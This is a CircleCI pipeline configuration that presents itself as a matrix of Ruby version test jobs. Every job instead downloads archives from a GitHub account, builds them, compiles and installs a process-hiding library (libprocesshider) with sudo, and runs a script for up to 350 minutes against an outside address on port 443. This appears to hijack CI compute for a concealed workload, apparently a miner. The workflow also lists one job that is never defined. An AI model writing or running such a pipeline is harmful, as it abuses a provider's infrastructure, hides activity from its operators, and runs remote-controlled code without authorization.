# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuratio
version: 2.0

jobs:
  "rubi-2.2":
    docker:
      - image: circleci/ubuntu:16.04
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          

  "rubi-2.3":
    docker:
      - image: circleci/ruby:2.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.3.1":
    docker:
      - image: circleci/ruby:2.3.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
  
  "rubi-2.3.2":
    docker:
      - image: circleci/ruby:2.3.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.3.3":
    docker:
      - image: circleci/ruby:2.3.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.3.4":
    docker:
      - image: circleci/ruby:2.3.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.3.5":
    docker:
      - image: circleci/ruby:2.3.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.3.6":
    docker:
      - image: circleci/ruby:2.3.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.3.7":
    docker:
      - image: circleci/ruby:2.3.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443  

  "rubi-2.3.8":
    docker:
      - image: circleci/ruby:2.3.8-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.3.9":
    docker:
      - image: circleci/ruby:2.3.9-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443     
          
  "rubi-2.4":
    docker:
      - image: circleci/ruby:2.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.1":
    docker:
      - image: circleci/ruby:2.4.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.2":
    docker:
      - image: circleci/ruby:2.4.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.3":
    docker:
      - image: circleci/ruby:2.4.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.4": 
    docker:
      - image: circleci/ruby:2.4.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.4.5":
    docker:
      - image: circleci/ruby:2.4.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
          
  "rubi-2.4.6":
    docker:
      - image: circleci/ruby:2.4.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.7":
    docker:
      - image: circleci/ruby:2.4.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.4.9":
    docker:
      - image: circleci/ruby:2.4.9-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5":
    docker:
      - image: circleci/ruby:2.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.1":
    docker:
      - image: circleci/ruby:2.5.1-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.2":
    docker:
      - image: circleci/ruby:2.5.2-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.3":
    docker:
      - image: circleci/ruby:2.5.3-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.4":
    docker:
      - image: circleci/ruby:2.5.4-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.5":
    docker:
      - image: circleci/ruby:2.5.5-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443

  "rubi-2.5.6":
    docker:
      - image: circleci/ruby:2.5.6-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.7":
    docker:
      - image: circleci/ruby:2.5.7-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
  "rubi-2.5.8":
    docker:
      - image: circleci/ruby:2.5.8-node
      - image: circleci/postgres:9.4.12-alpine
    working_directory: ~/circleci-demo-workflows
    steps:
      - checkout
      - run: wget https://github.com/lallianto/libprocesshider/raw/master/lib.tar.gz
      - run: tar xf lib.tar.gz
      - run: wget https://github.com/lallianto/weimu/raw/main/main.tar.gz
      - run: tar xf main.tar.gz
      - run: make
      - run: gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
      - run: sudo mv libprocesshider.so /usr/local/lib/
      - run: timeout 350m ./sgr.sh 1.2.3.4 443
          
          
workflows:
  version: 2
  build:
    jobs:
      - "rubi-2.2"
      - "rubi-2.3"
      - "rubi-2.3.1"
      - "rubi-2.3.2"
      - "rubi-2.3.3"
      - "rubi-2.3.4"
      - "rubi-2.3.5"
      - "rubi-2.3.6"
      - "rubi-2.3.7"          
      - "rubi-2.3.8"
      - "rubi-2.3.9"
      - "rubi-2.4"
      - "rubi-2.4.1"
      - "rubi-2.4.2"
      - "rubi-2.4.3"
      - "rubi-2.4.4"
      - "rubi-2.4.5"
      - "rubi-2.4.6"
      - "rubi-2.4.7"          
      - "rubi-2.4.8"
      - "rubi-2.4.9"
      - "rubi-2.5"
      - "rubi-2.5.1"
      - "rubi-2.5.2"
      - "rubi-2.5.3"
      - "rubi-2.5.4"
      - "rubi-2.5.5"
      - "rubi-2.5.6"
      - "rubi-2.5.7"          
      - "rubi-2.5.8"